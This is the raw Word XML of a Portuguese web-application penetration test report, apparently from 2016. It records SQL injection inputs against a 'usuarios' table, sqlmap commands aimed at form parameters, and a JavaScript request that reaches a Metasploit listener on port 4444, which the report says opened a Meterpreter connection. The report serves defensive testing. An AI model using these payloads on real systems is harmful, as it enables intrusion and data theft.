        <w:t>assou no teste. Nada aconteceu. Com o Javascript desabilitado no navegador a página não realizou nenhuma requisi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4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 função de </w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Javascript habilitado no browser, tentar provocar uma falha no momento de cadastro de dados, através da passagem de instruções </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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”</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58"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654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US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1231 ); select * from usuarios;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); select * from usuarios;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06B58" w:rsidRDefault="000F06E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Espera-se </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>que o sistema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> realize</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> o tratamento de todos os caracteres informados como parâmetros regulares da consulta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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564D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Passou no teste.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Não foi possível descobrir dados de outros servidores cadastrados na base de dados através da instrução de consulta fornecida a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 xml:space="preserve">. Entretanto, </w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">devido à falta de tratamento adequado para dados inválidos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</w:rPr>
        <w:t>” o seguinte erro foi exibido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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Erro:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data too long for column ‘id’ at row 1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Dessa forma foi</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> possível identificar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">que o campo </w:t>
      </w:r>
      <w:r w:rsidRPr="00564D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>“Siape”</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, no banco de dados corresponde à coluna ‘id’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softHyphen/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00906B58" w:rsidRDefault="0048383A" w:rsidP="000F06E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Sqlmap para realizar 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0F06E4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eiro, deve-se s</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>alvar a requisição POST capturada pela ferramenta Burp Suite em um arquivo a parte para utilizar no Sqlmap pos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nom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siap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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>qlmap -r paramsTelaConsServidor -p cpf --dbms=msql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</w:t>
      </w:r>
      <w:r w:rsidRPr="003D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>aramsTelaConsServidor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Pr="003D141C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 xml:space="preserve">“--current-db” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">comando utilizado para </w:t>
      </w:r>
      <w:r w:rsidRPr="003D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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77F75" w:rsidRDefault="00E77F75" w:rsidP="00E77F7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193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7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E4" w:rsidRDefault="009A2041" w:rsidP="000F06E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8</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Dados da requisição via POST capturada pelo Burp Suite</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRDefault="000F06E4" w:rsidP="000F06E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F06E4" w:rsidRDefault="000F06E4" w:rsidP="000F06E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Pr="000F06E4" w:rsidRDefault="000F06E4" w:rsidP="000F06E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realize o tratamento sobre os parâmetros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E77F7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3D141C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Resultad</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">o: </w:t>
      </w:r>
      <w:r w:rsidR="000F06E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>assou no teste. Os parâmetros “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>nome</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>siape</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>” e “</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>cpf</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>” não são injetáveis conforme mostram as figuras 28, 29 e 30.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRDefault="00E77F75" w:rsidP="00E77F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1154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5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9</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 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8C6DC7" w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Nome</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75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E77F75" w:rsidRPr="00A9523B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398653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23B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00A9523B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30</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 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8C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Siape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E77F75" w:rsidRDefault="009A2041" w:rsidP="00E77F75">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figura 31</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00A9523B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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E77F75">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>CPF.</w:t>
      </w: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5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1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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Servidor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00E5241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Tarefa realizada dia </w:t>
      </w:r>
      <w:r w:rsidR="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>19/05/16</w:t>
      </w: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751591" w:rsidRDefault="00751591" w:rsidP="00751591">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2124"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/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</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> o campo de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448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</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448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tentar </w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>incluir um script malicioso que consiga burlar o filtro CORS e realiza</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>r uma chamada a um listener do M</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">estasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>para executar um ataque usando M</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>eterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="009A7448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Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="0048383A" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="212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9A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC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ra burlar o filtro CORS, do navegador é necessário que sejam incluídas algumas credenciais no cabeçalho da requisição. O script abaixo simula uma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requisição credenciada por meio do atributo “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>withCredencials”</w:t>
      </w:r>
      <w:r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i/>
        </w:rPr>
        <w:t>É esperado que a aplicação impeça a conexão.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E5241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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Comando utilizado:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003E1ACB" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r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lastRenderedPageBreak/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505050"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E1E7FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>withCredentials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= true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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r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.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRDefault="008C6DC7" w:rsidP="000F06E4">
      <w:pPr>
        <w:ind w:left="2124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 w:rsidRPr="003E1ACB">
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB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 w:rsidR="008719F1"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conexão não seja aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRP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 w:rsidRPr="000F06E4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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7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8719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Passou no teste. O comando </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“withCredentials” </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontra-se depreciado e a conexão não ocorreu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00E77F75" w:rsidRDefault="00E77F75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E77F75" w:rsidRDefault="00E77F75" w:rsidP="008C6DC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="6496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8719F1" w:rsidRDefault="009A2041" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figura 32</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00FF400C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:t xml:space="preserve">Console do navegador indicando a </w:t>
      </w:r>
      <w:r w:rsidR="00751591">
        <w:t>depreciação</w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:t xml:space="preserve"> do atributo </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>“withCredencials”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRDefault="00751591" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="0048383A" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="212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FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008719F1" w:rsidRDefault="008719F1" w:rsidP="008C6DC7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Para burlar o filtro CORS, deve ser adicionado ao cabeçalho da requisição uma instrução que simule uma assinatura válida para o navegador. Para esse fim, foi utilizado a instrução “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">setRequestHeader” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para adicionar as credenciais maliciosas ao cabeçalho.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF400C" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF400C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Pr="003E1ACB" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
      </w:pP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r = </w:t>
      </w:r>
      <w:r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new</w:t>
      </w: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 </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB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</w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w: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(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003E1ACB" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
      </w:pP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r.open(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB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</w:rPr>
        <w:t>"GET"</w:t>
      </w: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,’</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB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</w:rPr>
        <w:t>http://IP_do_servidor:4444’,false</w:t>
      </w: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setRequestHeader(“</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE"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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin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”,”*”);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send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="2124"/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conexão não seja aberta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7"/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Resultado: </w:t>
      </w:r>
      <w:r w:rsidR="000F06E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Não Passou no teste. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Conforme 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figur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32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> e 33</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF400C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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> requisição foi</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> bem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>sucedida e o Metasploit conseguiu</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> iniciar o exploit.</w:t>
      </w:r>
      <w:r w:rsidR="000F06E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Através desse exploit, uma conexão entre máquina atacada e o sistema atacante é aberta podendo haver graves consequências como: Escalada de privilégios na máquina atacada e criação de backdoors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00FF400C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spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRDefault="00E77F75" w:rsidP="00E77F75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19945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F400C" w:rsidRDefault="009A2041" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figura 33</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00FF400C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00E52417">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Console do navegador indicando a conexão.</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00E52417">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00E77F75"/>
    <w:p w:rsidR="00E77F75" w:rsidRDefault="00E77F75" w:rsidP="00E77F75">
      <w:r>
        <w:t xml:space="preserve">                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3600450" cy="13239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751591">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figura 34</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00FF400C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="008719F1">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exploit inciado com sucesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F06E4" w:rsidRPr="00751591" w:rsidRDefault="000F06E4" w:rsidP="00751591">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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2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Pr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mapeamento de vulnerabilidades – Tela Relatórios</w:t>
      </w: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015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tarefa realizada dia 24/05/16</w:t>
      </w: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>Duração: 15 minutos.</w:t>
      </w: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</w:rPr>
      </w:pP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  <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
